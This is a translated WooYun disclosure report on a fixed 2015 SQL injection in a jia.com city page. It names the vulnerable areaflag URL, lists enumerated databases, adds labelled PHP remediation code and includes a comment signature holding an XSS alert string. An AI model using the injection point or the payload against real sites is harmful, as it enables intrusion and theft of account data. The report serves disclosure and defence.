
Vulnerability Summary

Defect ID: wooyun-2015-0137769

Title: MySQL injection on a Qijia (jia.com) site (over 4 million account passwords)

Vendor: jia.com

Author: DloveJ

Submitted: 2015-08-29 11:15

Fixed: 2015-10-14 11:17

Published: 2015-10-14 11:17

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: fixed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-08-29: Details sent to the vendor, awaiting vendor response
2015-08-31: Vendor confirmed; details disclosed to the vendor only
2015-09-10: Details disclosed to core white hats and domain experts
2015-09-20: Details disclosed to regular white hats
2015-09-30: Details disclosed to intern white hats
2015-10-14: Vendor fixed the vulnerability and published it voluntarily; details disclosed to the public

Brief description:

SQL injection; multiple tables exposed

Detailed description:

Injection point (the areaflag parameter): http://city.jia.com/index.php?areaflag=1


[Screenshot 1.jpg]


available databases [5]:
[*] information_schema
[*] shop
[*] shop_umege
[*] test
[*] test_shop_backup


[Screenshot 2.jpg]






[Screenshot 3.jpg]

[Screenshot 4.jpg]

[Screenshot 5.jpg]



Proof of vulnerability:

Remediation:
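The report gives no source for index.php and leaves this section empty, so the following is an added example, not code from the page or from jia.com. It shows the concatenation pattern that makes an integer parameter such as areaflag injectable, beside a hardened version that validates the type, binds the value through a PDO prepared statement, and connects with a least-privilege account so that other schemas (the page shows five being enumerated) are not reachable. The table, column, DB user and PHP function names are assumptions.

```php
<?php
// Added example; not the site's code. Table "shop" is named on the page; the
// column "areaflag", table columns, and DB user are assumed for illustration.

// VULNERABLE pattern: raw request input is spliced into the SQL text, so the
// value of areaflag can change the statement rather than act as data.
function vulnerableLookup(PDO $db, array $get): array
{
    $sql = "SELECT id, name FROM shop WHERE areaflag = " . $get['areaflag'];
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED pattern: reject anything that is not a positive integer, then bind
// the value as a typed parameter so SQL text and data travel separately.
function safeLookup(PDO $db, array $get): array
{
    $flag = filter_var(
        $get['areaflag'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($flag === false) {
        http_response_code(400);   // malformed input: fail closed, log upstream
        return [];
    }
    $stmt = $db->prepare("SELECT id, name FROM shop WHERE areaflag = :flag");
    $stmt->bindValue(':flag', $flag, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Defence in depth at the connection: real server-side prepares (no emulation),
// exceptions instead of silent failures, and an account granted SELECT on the
// one schema only, so a future injection cannot list or read other databases.
$db = new PDO(
    'mysql:host=localhost;dbname=shop;charset=utf8mb4',
    'city_readonly',            // assumed least-privilege account
    getenv('DB_PASS'),
    [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]
);

header('Content-Type: application/json');
echo json_encode(safeLookup($db, $_GET));
```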

Copyright notice: please credit the source when reposting, DloveJ@WooYun


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-08-31 09:11

Vendor reply:

Thanks for the submission! Because of staff changes, it had not been confirmed earlier.

Latest status:

2015-09-18: This is an old system; it has been taken offline.

2015-10-14: Taken offline.


Vulnerability rating:

Comments

  1. 2015-08-29 11:30 | 牛 小 帅 ( regular white hat | Rank:403 vulnerabilities:91 | Damn love, life is in chaos! In a person's lifetime, ... )

    It should get ignored, and then WooYun gives you 15 Rank

  2. 2015-08-29 11:41 | DloveJ ( regular white hat | Rank:1107 vulnerabilities:200 | <a href=javascrip:alert('xss')>s</a> ... )

    @牛 小 帅 I'd actually prefer it gets ignored and I get 15. I'm afraid they rate it 1 Rank themselves; then there's nothing to play for. Sigh

  3. 2015-08-31 09:15 | 牛 小 帅 ( regular white hat | Rank:403 vulnerabilities:91 | Damn love, life is in chaos! In a person's lifetime, ... )

    @DloveJ One more Rank, haha

  4. 2015-08-31 12:15 | DloveJ ( regular white hat | Rank:1107 vulnerabilities:200 | <a href=javascrip:alert('xss')>s</a> ... )

    @牛 小 帅 It must have been deliberate!! ←_←